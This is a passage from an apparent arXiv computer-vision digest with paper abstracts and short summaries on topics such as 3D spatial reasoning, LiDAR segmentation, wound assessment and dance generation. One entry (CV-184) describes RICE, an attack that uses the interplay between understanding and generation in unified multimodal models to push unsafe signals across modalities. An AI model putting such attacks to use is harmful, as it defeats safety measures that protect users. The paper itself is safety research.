【速读】:该论文旨在解决大模型在3D空间推理能力上的不足,这一问题限制了其在具身智能(embodied AI)和物理AI系统中的可靠应用。核心挑战在于现有视觉语言模型(Vision-Language Models, VLMs)难以捕捉精细的三维几何结构与空间关系,尤其在融合多视角几何信息时,通常仅使用视觉和几何编码器的深层特征进行后期融合,忽略了多层次的语义与几何信号,导致空间理解能力受限。解决方案的关键在于提出SpatialStack框架——一个通用的分层融合机制,通过逐层对齐视觉、几何与语言表征,在模型层级上实现多尺度几何特征与语言主干网络的同步堆叠与对齐,从而同时保留局部几何精度与全局语境语义,显著提升模型对3D空间关系的理解能力与泛化性能。
链接: https://arxiv.org/abs/2603.27437
作者: Jiang Zhang,Shijie Zhou,Bangya Liu,Achuta Kadambi,Zhiwen Fan
机构: TAMU; UCLA; Google; UW-Madison
类目: Computer Vision and Pattern Recognition (cs.CV)
备注: CVPR 2026, Project Website: this https URL
Abstract:Large vision-language models (VLMs) still struggle with reliable 3D spatial reasoning, a core capability for embodied and physical AI systems. This limitation arises from their inability to capture fine-grained 3D geometry and spatial relationships. While recent efforts have introduced multi-view geometry transformers into VLMs, they typically fuse only the deep-layer features from vision and geometry encoders, discarding rich hierarchical signals and creating a fundamental bottleneck for spatial understanding. To overcome this, we propose SpatialStack, a general hierarchical fusion framework that progressively aligns vision, geometry, and language representations across the model hierarchy. Moving beyond conventional late-stage vision-geometry fusion, SpatialStack stacks and synchronizes multi-level geometric features with the language backbone, enabling the model to capture both local geometric precision and global contextual semantics. Building upon this framework, we develop VLM-SpatialStack, a model that achieves state-of-the-art performance on multiple 3D spatial reasoning benchmarks. Extensive experiments and ablations demonstrate that our multi-level fusion strategy consistently enhances 3D understanding and generalizes robustly across diverse spatial reasoning tasks, establishing SpatialStack as an effective and extensible design paradigm for vision-language-geometry integration in next-generation multimodal physical AI systems.
[CV-176] Mind the Shape Gap: A Benchmark and Baseline for Deformation-Aware 6D Pose Estimation of Agricultural Produce
【速读】:该论文旨在解决农业机器人采摘场景中因农产品生物可变形性和类内形状差异大而导致的6D位姿估计精度下降问题。传统实例级方法因难以获取每件农产品的精确3D模型而失效,而依赖固定模板的类别级方法在真实几何偏差下性能显著退化。解决方案的关键在于提出SEED(Simultaneous Estimation of posE and Deformation),这是一个仅使用RGB图像的统一框架,能够从单张图像中联合预测6D位姿和显式的网格形变(lattice deformations),并通过在合成数据上应用UV层级的生成纹理增强进行训练,在8个农产品类别中有6个优于MegaPose,验证了显式形状建模对提升农业机器人位姿估计可靠性的重要性。
链接: https://arxiv.org/abs/2603.27429
作者: Nikolas Chatzis,Angeliki Tsinouka,Katerina Papadimitriou,Niki Efthymiou,Marios Glytsos,George Retsinas,Paris Oikonomou,Gerasimos Potamianos,Petros Maragos,Panagiotis Paraskevas Filntisis
机构: Athena Research Center (雅典研究中心); Hellenic Robotics Center of Excellence (希腊机器人卓越中心); School of Electrical and Computer Engineering, NTUA (国立技术大学电气与计算机工程学院); New York University (纽约大学); Department of Electrical and Computer Engineering, UTH (塞萨洛尼基大学电气与计算机工程系)
类目: Computer Vision and Pattern Recognition (cs.CV)
备注:
Abstract:Accurate 6D pose estimation for robotic harvesting is fundamentally hindered by the biological deformability and high intra-class shape variability of agricultural produce. Instance-level methods fail in this setting, as obtaining exact 3D models for every unique piece of produce is practically infeasible, while category-level approaches that rely on a fixed template suffer significant accuracy degradation when the prior deviates from the true instance geometry. To bridge such lack of robustness to deformation, we introduce PEAR (Pose and dEformation of Agricultural pRoduce), the first benchmark providing joint 6D pose and per-instance 3D deformation ground truth across 8 produce categories, acquired via a robotic manipulator for high annotation accuracy. Using PEAR, we show that state-of-the-art methods suffer up to 6x performance degradation when faced with the inherent geometric deviations of real-world produce. Motivated by this finding, we propose SEED (Simultaneous Estimation of posE and Deformation), a unified RGB-only framework that jointly predicts 6D pose and explicit lattice deformations from a single image across multiple produce categories. Trained entirely on synthetic data with generative texture augmentation applied at the UV level, SEED outperforms MegaPose on 6 out of 8 categories under identical RGB-only conditions, demonstrating that explicit shape modeling is a critical step toward reliable pose estimation in agricultural robotics.
[CV-177] Decompose Mix Adapt: A Unified Framework for Parameter-Efficient Neural Network Recombination and Compression CVPR
【速读】:该论文旨在解决参数重组(Parameter Recombination, PR)方法在实际应用中难以同时支持多种任务的问题,例如在模型压缩(Model Compression, MC)和参数高效微调(Parameter-Efficient Fine-Tuning, PEFT)之间缺乏统一框架,导致部署时无法兼顾资源受限场景下的性能与效率。其解决方案的关键在于提出一种名为CRISP(Coefficient-gated weight Recombination by Interpolated Shared basis Projections)的通用方法,通过将预训练权重分解为共享的基础矩阵(basis matrices)和用于混合的投影权重(mixer weights),实现多任务协同:共享基础矩阵可支持模型压缩,而极小规模的混合权重(实验中少于200个参数)则使PEFT成为可能,从而在单一框架内无缝集成MC与PEFT,且显著优于现有双任务方法及当前最先进的PEFT方案。
链接: https://arxiv.org/abs/2603.27383
作者: Nazia Tasnim,Shrimai Prabhumoye,Bryan A. Plummer
机构: Boston University (波士顿大学); NVIDIA (英伟达)
类目: Computer Vision and Pattern Recognition (cs.CV)
备注: Accepted in CVPR, 2026 (Main Track)
Abstract:Parameter Recombination (PR) methods aim to efficiently compose the weights of a neural network for applications like Parameter-Efficient FineTuning (PEFT) and Model Compression (MC), among others. Most methods typically focus on one application of PR, which can make composing them challenging. For example, when deploying a large model you may wish to compress the model and also quickly adapt to new settings. However, PEFT methods often can still contain millions of parameters. This may be small compared to the original model size, but can be problematic in resource constrained deployments like edge devices, where they take a larger portion of the compressed model’s parameters. To address this, we present Coefficient-gated weight Recombination by Interpolated Shared basis Projections (CRISP), a general approach that seamlessly integrates multiple PR tasks within the same framework. CRISP accomplishes this by factorizing pretrained weights into basis matrices and their component mixing projections. Sharing basis matrices across layers and adjusting its size enables us to perform MC, whereas the mixer weight’s small size (fewer than 200 in some experiments) enables CRISP to support PEFT. Experiments show CRISP outperforms methods from prior work capable of dual-task applications by 4-5% while also outperforming the state-of-the-art in PEFT by 1.5% and PEFT+MC combinations by 1%. Our code is available on the repository: this https URL.
[CV-178] Bridging Visual Representation and Reinforcement Learning from Verifiable Rewards in Large Vision-Language Models
【速读】:该论文旨在解决大型视觉语言模型(LVLMs)在应用强化学习从可验证奖励(RLVR)中训练时,因结构化表征瓶颈导致的视觉信息建模不足问题。现有方法普遍缺乏对视觉信息的显式建模与有效利用,使得视觉表示难以与强化学习优化过程紧密耦合,从而限制了多模态推理性能的进一步提升。解决方案的关键在于提出一种即插即用的奖励重加权机制——KAWHI(Key-Region Aligned Weighted Harmonic Incentive),其通过分层几何聚合自适应定位语义显著区域、基于结构化归因识别视觉关键注意力头,并进行段落级别的信用重新分配,从而将空间视觉证据与语义决定性的推理步骤对齐,显著增强统一奖励策略优化方法(如GRPO和GSPO)在多模态任务中的表现。
链接: https://arxiv.org/abs/2603.27375
作者: Yuhang Han,Yuyang Wu,Zhengbo Jiao,Yiyu Wang,Xuyang Liu,Shaobo Wang,Hanlin Xu,Xuming Hu,Linfeng Zhang
机构: EPIC Lab, SJTU; Huawei; HKUST (GZ)
类目: Computer Vision and Pattern Recognition (cs.CV)
备注: Homepage: \url{ this https URL }
Abstract:Reinforcement Learning from Verifiable Rewards (RLVR) has substantially enhanced the reasoning capabilities of large language models in abstract reasoning tasks. However, its application to Large Vision-Language Models (LVLMs) remains constrained by a structural representational bottleneck. Existing approaches generally lack explicit modeling and effective utilization of visual information, preventing visual representations from being tightly coupled with the reinforcement learning optimization process and thereby limiting further improvements in multimodal reasoning performance. To address this limitation, we propose KAWHI (Key-Region Aligned Weighted Harmonic Incentive), a plug-and-play reward reweighting mechanism that explicitly incorporates structured visual information into uniform reward policy optimization methods (e.g., GRPO and GSPO). The method adaptively localizes semantically salient regions through hierarchical geometric aggregation, identifies vision-critical attention heads via structured attribution, and performs paragraph-level credit reallocation to align spatial visual evidence with semantically decisive reasoning steps. Extensive empirical evaluations on diverse reasoning benchmarks substantiate KAWHI as a general-purpose enhancement module, consistently improving the performance of various uniform reward optimization methods. Experiments on multimodal reasoning benchmarks including MMStar and MathVista show consistent gains. Project page: KAWHI (this https URL)
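KAWHI 的段落级信用重新分配可以直观理解为:视觉显著性高的推理段落获得更大的奖励权重,同时对权重做归一化以保持整体奖励尺度不变。下面是一个纯 Python 的最小示意(`alpha` 超参数与均值归一化方式均为本文假设,并非论文原式):

```python
def reweight_rewards(rewards, saliency, alpha=0.5):
    """按视觉显著性对各推理段落的奖励做重加权的示意实现。

    rewards: 各段落的原始奖励;saliency: 各段落的视觉显著性得分(0~1)。
    权重做均值归一化,使得当所有原始奖励相等时,奖励总量保持不变。
    """
    weights = [1.0 + alpha * s for s in saliency]
    mean_w = sum(weights) / len(weights)
    return [r * w / mean_w for r, w in zip(rewards, weights)]
```

例如两个段落奖励相同但显著性分别为 1.0 与 0.0 时,重加权后前者获得更多信用、后者被抑制,而总奖励保持不变,这正是"将信用向视觉关键步骤转移"的效果。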
[CV-179] HMPDM: A Diffusion Model for Driving Video Prediction with Historical Motion Priors
【速读】:该论文旨在解决现有视频预测模型在自动驾驶场景中面临的两大挑战:一是多阶段训练流程导致的效率低下,二是对真实驾驶场景中多样化运动模式建模不足所引发的时间一致性差和视觉质量下降问题。解决方案的关键在于提出一种基于历史运动先验信息的扩散模型(Historical Motion Priors-informed Diffusion Model, HMPDM),其核心创新包括:(i) 时序感知潜在条件模块(Temporal-aware Latent Conditioning, TaLC)用于隐式注入历史运动信息;(ii) 运动感知金字塔编码器(Motion-aware Pyramid Encoder, MaPE)实现多尺度运动特征表示;(iii) 自条件策略(Self-Conditioning, SC)提升迭代去噪过程的稳定性,从而显著增强视频预测的时空一致性和生成质量。
链接: https://arxiv.org/abs/2603.27371
作者: Ke Li,Tianjia Yang,Kaidi Liang,Xianbiao Hu,Ruwen Qin
机构: Stony Brook University (石溪大学); Pennsylvania State University (宾夕法尼亚州立大学)
类目: Computer Vision and Pattern Recognition (cs.CV)
备注:
Abstract:Video prediction is a useful function for autonomous driving, enabling intelligent vehicles to reliably anticipate how driving scenes will evolve and thereby supporting reasoning and safer planning. However, existing models are constrained by multi-stage training pipelines and remain insufficient in modeling the diverse motion patterns in real driving scenes, leading to degraded temporal consistency and visual quality. To address these challenges, this paper introduces the historical motion priors-informed diffusion model (HMPDM), a video prediction model that leverages historical motion priors to enhance motion understanding and temporal coherence. The proposed deep learning system introduces three key designs: (i) a Temporal-aware Latent Conditioning (TaLC) module for implicit historical motion injection; (ii) a Motion-aware Pyramid Encoder (MaPE) for multi-scale motion representation; (iii) a Self-Conditioning (SC) strategy for stable iterative denoising. Extensive experiments on the Cityscapes and KITTI benchmarks demonstrate that HMPDM outperforms state-of-the-art video prediction methods with efficiency, achieving a 28.2% improvement in FVD on Cityscapes under the same monocular RGB input configuration setting. The implementation codes are publicly available at this https URL.
[CV-180] Falcon Perception
【速读】:该论文旨在解决感知系统中模块化编码器-解码器架构的局限性问题,即是否必须将视觉特征提取与任务预测分离,还是可以通过统一的早期融合(early-fusion)结构实现感知与任务建模的协同优化。其核心解决方案是提出Falcon Perception,一个统一的密集Transformer模型,该模型在第一层即共享参数空间处理图像块(image patches)和文本标记(text tokens),采用混合注意力机制(图像标记间双向注意力、预测标记自回归因果注意力),从而整合全局视觉上下文与可变长度实例生成能力。关键创新在于通过轻量级标记接口和专用头设计实现连续空间输出的并行高分辨率掩码预测,使复杂度主要集中在数据和训练信号上,而非模型结构本身,显著提升了mask质量(SA-Co数据集上Macro-F₁达68.0,优于SAM3的62.3)。
链接: https://arxiv.org/abs/2603.27365
作者: Aviraj Bevli,Sofian Chaybouti,Yasser Dahou,Hakim Hacid,Ngoc Dung Huynh,Phuc H. Le Khac,Sanath Narayan,Wamiq Reyaz Para,Ankit Singh
机构: 未知
类目: Computer Vision and Pattern Recognition (cs.CV)
备注:
Abstract:Perception-centric systems are typically implemented with a modular encoder-decoder pipeline: a vision backbone for feature extraction and a separate decoder (or late-fusion module) for task prediction. This raises a central question: is this architectural separation essential or can a single early-fusion stack do both perception and task modeling at scale? We introduce Falcon Perception, a unified dense Transformer that processes image patches and text tokens in a shared parameter space from the first layer, using a hybrid attention pattern (bidirectional among image tokens, causal for prediction tokens) to combine global visual context with autoregressive, variable-length instance generation. To keep dense outputs practical, Falcon Perception retains a lightweight token interface and decodes continuous spatial outputs with specialized heads, enabling parallel high-resolution mask prediction. Our design promotes simplicity: we keep a single scalable backbone and shift complexity toward data and training signals, adding only small heads where outputs are continuous and dense. On SA-Co, Falcon Perception improves mask quality to 68.0 Macro-F _1 compared to 62.3 of SAM3. We also introduce PBench, a benchmark targeting compositional prompts (OCR, spatial constraints, relations) and dense long-context regimes, where the model shows better gains. Finally, we extend the same early-fusion recipe to Falcon OCR: a compact 300M-parameter model which attains 80.3% on olmOCR and 88.64 on OmniDocBench.
[CV-181] rraSeg: Self-Supervised Ground Segmentation for Any LiDAR CVPR2026
【速读】:该论文旨在解决LiDAR地面分割(ground segmentation)任务中现有方法依赖特定传感器配置或昂贵的逐点人工标注标签,从而严重限制模型泛化能力和可扩展性的问题。解决方案的关键在于提出TerraSeg——首个自监督、领域无关的LiDAR地面分割模型,并构建OmniLiDAR大规模统一数据集(聚合12个主流公开基准数据集,包含近2200万原始扫描样本),通过PseudoLabeler模块实现无需人工标注的自监督运行时优化生成高质量伪标签,从而在nuScenes、SemanticKITTI和Waymo Perception等基准上达到SOTA性能并具备实时推理能力。
链接: https://arxiv.org/abs/2603.27344
作者: Ted Lentsch,Santiago Montiel-Marín,Holger Caesar,Dariu M. Gavrila
机构: Delft University of Technology (代尔夫特理工大学); University of Alcalá (阿尔卡拉大学)
类目: Computer Vision and Pattern Recognition (cs.CV)
备注: CVPR 2026
Abstract:LiDAR perception is fundamental to robotics, enabling machines to understand their environment in 3D. A crucial task for LiDAR-based scene understanding and navigation is ground segmentation. However, existing methods are either handcrafted for specific sensor configurations or rely on costly per-point manual labels, severely limiting their generalization and scalability. To overcome this, we introduce TerraSeg, the first self-supervised, domain-agnostic model for LiDAR ground segmentation. We train TerraSeg on OmniLiDAR, a unified large-scale dataset that aggregates and standardizes data from 12 major public benchmarks. Spanning almost 22 million raw scans across 15 distinct sensor models, OmniLiDAR provides unprecedented diversity for learning a highly generalizable ground model. To supervise training without human annotations, we propose PseudoLabeler, a novel module that generates high-quality ground and non-ground labels through self-supervised per-scan runtime optimization. Extensive evaluations demonstrate that, despite using no manual labels, TerraSeg achieves state-of-the-art results on nuScenes, SemanticKITTI, and Waymo Perception while delivering real-time performance. Our code and model weights are publicly available.
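PseudoLabeler 通过逐扫描的自监督运行时优化生成地面/非地面伪标签,其细节未在摘要中给出。作为直觉示意,下面用纯 Python 实现一个极简版伪标签器(以低分位高度近似地面高度,阈值 `margin` 为本文假设的参数;真实方法需处理坡度、遮挡等,远比这复杂):

```python
def pseudo_ground_labels(points, margin=0.2):
    """基于高度分位的极简地面伪标签示意。

    points: 点云,每个点为 (x, y, z) 三元组。
    以较低分位的 z 值估计地面高度,把高度接近该值的点标为地面(1),其余为非地面(0)。
    """
    zs = sorted(p[2] for p in points)
    ground_z = zs[max(0, len(zs) // 10)]  # 取约第 10 百分位作为地面高度估计
    return [1 if abs(p[2] - ground_z) <= margin else 0 for p in points]
```

这类无需人工标注的启发式标签即可作为训练信号,驱动一个可泛化的地面分割网络学习,这也是摘要中"无人工标签即可训练"这一思路的简化版本。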
[CV-182] A Comparative Study in Surgical AI: Datasets Foundation Models and Barriers to Med-AGI
[Quick Read]: This paper examines why current generative AI models underperform on neurosurgical image-analysis tasks, even on the seemingly simple task of tool detection. Despite continued growth in model parameters and training data, the study finds that even multi-billion-parameter Vision Language Models (VLMs) with extensive training fall short of reliable performance; scaling experiments further show that increasing model size or training time yields only marginal gains, and some limiting factors cannot be removed by added compute alone. The paper argues that the bottleneck is not merely data and label availability but the complexity of surgical scenes, including multimodal data integration, human interaction, and physical effects, which fundamentally challenges model generalization; future solutions should therefore focus on better architectures and task formulations rather than pure compute scaling.
Link: https://arxiv.org/abs/2603.27341
Authors: Kirill Skobelev, Eric Fithian, Yegor Baranovski, Jack Cook, Sandeep Angara, Shauna Otto, Zhuang-Fang Yi, John Zhu, Daniel A. Donoho, X.Y. Han, Neeraj Mainkar, Margaux Masson-Forsythe
Institutions: Center for Applied AI, Chicago Booth, Chicago, IL, USA; Surgical Data Science Collective, Washington D.C., USA; Children’s National Hospital, Washington D.C., USA; Operations Management Tolan Center for Healthcare, Chicago Booth, Chicago, IL, USA
Subjects: Artificial Intelligence (cs.AI); Computer Vision and Pattern Recognition (cs.CV); Machine Learning (cs.LG)
Comments:
Abstract:Recent Artificial Intelligence (AI) models have matched or exceeded human experts in several benchmarks of biomedical task performance, but have lagged behind on surgical image-analysis benchmarks. Since surgery requires integrating disparate tasks – including multimodal data integration, human interaction, and physical effects – generally-capable AI models could be particularly attractive as a collaborative tool if performance could be improved. On the one hand, the canonical approach of scaling architecture size and training data is attractive, especially since there are millions of hours of surgical video data generated per year. On the other hand, preparing surgical data for AI training requires significantly higher levels of professional expertise, and training on that data requires expensive computational resources. These trade-offs paint an uncertain picture of whether and to what extent modern AI could aid surgical practice. In this paper, we explore this question through a case study of surgical tool detection using state-of-the-art AI methods available in 2026. We demonstrate that even with multi-billion parameter models and extensive training, current Vision Language Models fall short in the seemingly simple task of tool detection in neurosurgery. Additionally, we show scaling experiments indicating that increasing model size and training time only leads to diminishing improvements in relevant performance metrics. Thus, our experiments suggest that current models could still face significant obstacles in surgical use cases. Moreover, some obstacles cannot be simply "scaled away" with additional compute and persist across diverse model architectures, raising the question of whether data and label availability are the only limiting factors. We discuss the main contributors to these constraints and advance potential solutions.
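The "diminishing improvements" from scaling can be made concrete with a saturating power law, a common functional form for scaling curves (the form and all numbers below are hypothetical illustrations, not the paper's measurements):

```python
def powerlaw_error(n_params, a=2.0, b=0.3, c=0.35):
    """Hypothetical saturating scaling curve: error = c + a * N^(-b).
    The irreducible term c models obstacles that cannot be 'scaled away'."""
    return c + a * n_params ** (-b)

sizes = [1e8, 1e9, 1e10, 1e11]                 # model parameter counts
errors = [powerlaw_error(n) for n in sizes]    # error keeps falling...
gains = [errors[i] - errors[i + 1] for i in range(len(errors) - 1)]
# ...but each 10x increase in size buys a smaller improvement than the last,
# and error never drops below the floor c.
```

Under such a curve, each order-of-magnitude increase in parameters yields a strictly smaller gain, matching the qualitative trend the abstract reports.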
[CV-183] EVA: Bridging Performance and Human Alignment in Hard-Attention Vision Models for Image Classification
[Quick Read]: This paper addresses the "alignment tax": optimizing vision models purely for classification accuracy degrades alignment with human gaze scanpaths, limiting interpretability. The key to the solution is EVA, a neuroscience-inspired hard-attention mechanistic testbed that samples a small number of sequential glimpses using a minimal fovea-periphery representation with a CNN-based feature extractor, and combines variance control and adaptive gating to stabilize and regulate attention dynamics. Trained with a standard classification objective and no gaze supervision, EVA improves scanpath agreement with human eye movements (e.g., DTW, NSS) while maintaining competitive accuracy, and scales well: on ImageNet-100 and COCO-Search18 it produces human-like gaze patterns on complex natural scenes, offering a principled framework for trustworthy, interpretable active vision.
Link: https://arxiv.org/abs/2603.27340
Authors: Pengcheng Pan, Yonekura Shogo, Kuniyoshi Yasuo
Institutions: The University of Tokyo
Subjects: Computer Vision and Pattern Recognition (cs.CV)
Comments:
Abstract:Optimizing vision models purely for classification accuracy can impose an alignment tax, degrading human-like scanpaths and limiting interpretability. We introduce EVA, a neuroscience-inspired hard-attention mechanistic testbed that makes the performance-human-likeness trade-off explicit and adjustable. EVA samples a small number of sequential glimpses using a minimal fovea-periphery representation with CNN-based feature extractor and integrates variance control and adaptive gating to stabilize and regulate attention dynamics. EVA is trained with the standard classification objective without gaze supervision. On CIFAR-10 with dense human gaze annotations, EVA improves scanpath alignment under established metrics such as DTW, NSS, while maintaining competitive accuracy. Ablations show that CNN-based feature extraction drives accuracy but suppresses human-likeness, whereas variance control and gating restore human-aligned trajectories with minimal performance loss. We further validate EVA’s scalability on ImageNet-100 and evaluate scanpath alignment on COCO-Search18 without COCO-Search18 gaze supervision or finetuning, where EVA yields human-like scanpaths on natural scenes without additional training. Overall, EVA provides a principled framework for trustworthy, human-interpretable active vision.
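Of the scanpath metrics named above, DTW has a standard dynamic-programming form; a minimal sketch for 2D fixation sequences follows (a textbook formulation, not necessarily the paper's exact variant):

```python
def dtw(path_a, path_b):
    """Dynamic time warping distance between two 2D scanpaths (lists of (x, y))."""
    inf = float("inf")
    n, m = len(path_a), len(path_b)
    cost = [[inf] * (m + 1) for _ in range(n + 1)]
    cost[0][0] = 0.0
    for i in range(1, n + 1):
        for j in range(1, m + 1):
            ax, ay = path_a[i - 1]
            bx, by = path_b[j - 1]
            d = ((ax - bx) ** 2 + (ay - by) ** 2) ** 0.5  # Euclidean step cost
            # Allow match, insertion, or deletion of a fixation.
            cost[i][j] = d + min(cost[i - 1][j], cost[i][j - 1], cost[i - 1][j - 1])
    return cost[n][m]

human = [(0, 0), (5, 5), (10, 0)]
model = [(0, 0), (5, 5), (5, 5), (10, 0)]   # same route, one repeated fixation
score = dtw(human, model)                    # warping absorbs the repeat
```

Lower DTW means the model's scanpath can be warped onto the human one at lower cost; a repeated fixation on the same location costs nothing, which is why DTW is forgiving of differing scanpath lengths.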
[CV-184] Unsafe by Reciprocity: How Generation-Understanding Coupling Undermines Safety in Unified Multimodal Models
[Quick Read]: This paper investigates safety risks in Unified Multimodal Models (UMMs) arising from the tight coupling of understanding and generation, noting that existing safety research analyzes the two functions in isolation and overlooks novel attack paths created by their bidirectional interaction. The key to the solution is RICE (Reciprocal Interaction-based Cross-functionality Exploitation), an attack paradigm that explicitly exploits the bidirectional interaction between the understanding and generation modules. It systematically evaluates Generation-to-Understanding (G-U) and Understanding-to-Generation (U-G) attack pathways, showing that unsafe intermediate signals can propagate across modalities and amplify safety risks; experiments demonstrate high Attack Success Rates (ASR) in both directions, revealing a structural vulnerability inherent to UMMs.
Link: https://arxiv.org/abs/2603.27332
Authors: Kaishen Wang, Heng Huang
Institutions: Unknown
Subjects: Computer Vision and Pattern Recognition (cs.CV)
Comments: 7 figures, 3 tables
Abstract:Recent advances in Large Language Models (LLMs) and Text-to-Image (T2I) models have led to the emergence of Unified Multimodal Models (UMMs), where multimodal understanding and image generation are tightly integrated within a shared architecture. Prior studies suggest that such reciprocity enhances cross-functionality performance through shared representations and joint optimization. However, the safety implications of this tight coupling remain largely unexplored, as existing safety research predominantly analyzes understanding and generation functionalities in isolation. In this work, we investigate whether cross-functionality reciprocity itself constitutes a structural source of vulnerability in UMMs. We propose RICE: Reciprocal Interaction-based Cross-functionality Exploitation, a novel attack paradigm that explicitly exploits bidirectional interactions between understanding and generation. Using this framework, we systematically evaluate Generation-to-Understanding (G-U) and Understanding-to-Generation (U-G) attack pathways, demonstrating that unsafe intermediate signals can propagate across modalities and amplify safety risks. Extensive experiments show high Attack Success Rates (ASR) in both directions, revealing previously overlooked safety weaknesses inherent to UMMs.
[CV-185] Improving Automated Wound Assessment Using Joint Boundary Segmentation and Multi-Class Classification Models
[Quick Read]: This paper addresses the limited clinical applicability of current AI models for wound management, which typically target a narrow set of wound types or perform only a single task (boundary segmentation or classification). The key to the solution is a YOLOv11-based deep learning model that jointly performs Wound Boundary Segmentation (WBS) and Wound Classification (WC) across five clinically relevant wound types (burn injury, pressure injury, diabetic foot ulcer, vascular ulcer, and surgical wound). A type-balanced dataset of 2,963 annotated images was built, with stratified five-fold cross-validation ensuring robust evaluation; augmentation with rotation, flipping, and variations in brightness, saturation, and exposure markedly improved detection of visually subtle burn cases. YOLOv11x achieved the best results, with F1-scores of 0.9341 (WBS) and 0.8736 (WC), while the lightweight YOLOv11n offered comparable accuracy at lower computational cost, suiting resource-constrained deployments.
Link: https://arxiv.org/abs/2603.27325
Authors: Mehedi Hasan Tusar, Fateme Fayyazbakhsh, Igor Melnychuk, Ming C. Leu
Institutions: Unknown
Subjects: Computer Vision and Pattern Recognition (cs.CV); Artificial Intelligence (cs.AI)
Comments:
Abstract:Accurate wound classification and boundary segmentation are essential for guiding clinical decisions in both chronic and acute wound management. However, most existing AI models are limited, focusing on a narrow set of wound types or performing only a single task (segmentation or classification), which reduces their clinical applicability. This study presents a deep learning model based on YOLOv11 that simultaneously performs wound boundary segmentation (WBS) and wound classification (WC) across five clinically relevant wound types: burn injury (BI), pressure injury (PI), diabetic foot ulcer (DFU), vascular ulcer (VU), and surgical wound (SW). A wound-type balanced dataset of 2,963 annotated images was created to train the models for both tasks, with stratified five-fold cross-validation ensuring robust and unbiased evaluation. The models trained on the original non-augmented dataset achieved consistent performance across folds, though BI detection accuracy was relatively lower. Therefore, the dataset was augmented using rotation, flipping, and variations in brightness, saturation, and exposure to help the model learn more generalized and invariant features. This augmentation significantly improved model performance, particularly in detecting visually subtle BI cases. Among tested variants, YOLOv11x achieved the highest performance with F1-scores of 0.9341 (WBS) and 0.8736 (WC), while the lightweight YOLOv11n provided comparable accuracy at lower computational cost, making it suitable for resource-constrained deployments. Supported by confusion matrices and visual detection outputs, the results confirm the model’s robustness against complex backgrounds and high intra-class variability, demonstrating the potential of YOLOv11-based architectures for accurate, real-time wound analysis in both clinical and remote care settings.
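The stratified five-fold cross-validation used above keeps each wound class evenly represented across folds; a minimal round-robin sketch of the fold assignment (a simplification of standard stratified splitting, with the paper's five class codes as toy labels):

```python
from collections import defaultdict

def stratified_folds(labels, k=5):
    """Assign each sample index to one of k folds so that every class is
    spread as evenly as possible across folds (round-robin per class)."""
    by_class = defaultdict(list)
    for idx, label in enumerate(labels):
        by_class[label].append(idx)
    folds = [0] * len(labels)
    for members in by_class.values():
        for pos, idx in enumerate(members):
            folds[idx] = pos % k   # cycle class members through the folds
    return folds

# Toy labels over the five wound types used in the paper.
labels = ["BI"] * 10 + ["PI"] * 10 + ["DFU"] * 10 + ["VU"] * 10 + ["SW"] * 10
folds = stratified_folds(labels)
```

In practice one would also shuffle within each class before assignment; the point here is only that each fold ends up with the same per-class proportions, so validation scores are not skewed by class imbalance.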
[CV-186] TokenDance: Token-to-Token Music-to-Dance Generation with Bidirectional Mamba CVPR2026
[Quick Read]: This paper targets the poor real-world performance of current music-to-dance generation models: the limited coverage of existing 3D dance datasets leads to weak generalization over music styles and choreographic patterns, so generated dances become simplistic and repetitive, lacking expressiveness and realism. The key to the solution is TokenDance, a two-stage framework built on dual-modality tokenization and efficient token-level generation. In the first stage, Finite Scalar Quantization factorizes dance motion into upper- and lower-body components with kinematic-dynamic constraints, and decomposes music into semantic and acoustic features with dedicated codebooks, explicitly capturing choreographic structure. In the second stage, a Local-Global-Local token-to-token generator built on a Bidirectional Mamba backbone ensures strong music-dance alignment while enabling efficient non-autoregressive inference, markedly improving generation quality and speed to state-of-the-art (SOTA) levels.
Link: https://arxiv.org/abs/2603.27314
Authors: Ziyue Yang, Kaixing Yang, Xulong Tang
Institutions: Brown University; Renmin University of China; The University of Texas at Dallas
Subjects: Artificial Intelligence (cs.AI); Computer Vision and Pattern Recognition (cs.CV); Sound (cs.SD)
Comments: CVPR2026 Workshop on HuMoGen
Abstract:Music-to-dance generation has broad applications in virtual reality, dance education, and digital character animation. However, the limited coverage of existing 3D dance datasets confines current models to a narrow subset of music styles and choreographic patterns, resulting in poor generalization to real-world music. Consequently, generated dances often become overly simplistic and repetitive, substantially degrading expressiveness and realism. To tackle this problem, we present TokenDance, a two-stage music-to-dance generation framework that explicitly addresses this limitation through dual-modality tokenization and efficient token-level generation. In the first stage, we discretize both dance and music using Finite Scalar Quantization, where dance motions are factorized into upper and lower-body components with kinematic-dynamic constraints, and music is decomposed into semantic and acoustic features with dedicated codebooks to capture choreography-specific structures. In the second stage, we introduce a Local-Global-Local token-to-token generator built on a Bidirectional Mamba backbone, enabling coherent motion synthesis, strong music-dance alignment, and efficient non-autoregressive inference. Extensive experiments demonstrate that TokenDance achieves overall state-of-the-art (SOTA) performance in both generation quality and inference speed, highlighting its effectiveness and practical value for real-world music-to-dance applications.
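Finite Scalar Quantization, used in the first stage, rounds each latent dimension to a small fixed set of levels; a minimal sketch follows (the level count is an assumption, and the straight-through gradient estimator used during training is omitted):

```python
import math

def fsq_quantize(z, levels=5):
    """Finite Scalar Quantization sketch: squash each dimension into [-1, 1]
    with tanh, then round it to one of `levels` evenly spaced values."""
    half = (levels - 1) / 2   # 5 levels -> per-dim codebook {-1, -0.5, 0, 0.5, 1}
    return [round(math.tanh(x) * half) / half for x in z]

codes = fsq_quantize([2.3, -0.1, 0.0, -5.0])
# The implicit codebook has levels**dim entries without any learned embedding table,
# which is what makes FSQ a lightweight alternative to VQ-VAE codebooks.
```

Each dimension independently snaps to one of a handful of values, so the token id is simply the tuple of quantized levels.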
[CV-187] MeshTailor: Cutting Seams via Generative Mesh Traversal
[Quick Read]: This paper tackles the difficulty of generating edge-aligned seams on 3D surfaces, where existing optimization-based or extrinsic learning-based methods suffer from projection artifacts and fragile snapping heuristics. The key to the solution is MeshTailor, the first generative framework that operates directly on the mesh graph. It introduces ChainingSeams, a coarse-to-fine hierarchical serialization of the seam graph that prioritizes global structural cuts before refining local details, together with a dual-stream encoder that fuses topological and geometric context; on this basis, an autoregressive pointer layer traces seam paths vertex-by-vertex within local neighborhoods, yielding projection-free, edge-aligned, high-quality seams.
Link: https://arxiv.org/abs/2603.27309
Authors: Xueqi Ma, Xingguang Yan, Congyue Zhang, Hui Huang
Institutions: Shenzhen University; Simon Fraser University
Subjects: Graphics (cs.GR); Computer Vision and Pattern Recognition (cs.CV)
Comments:
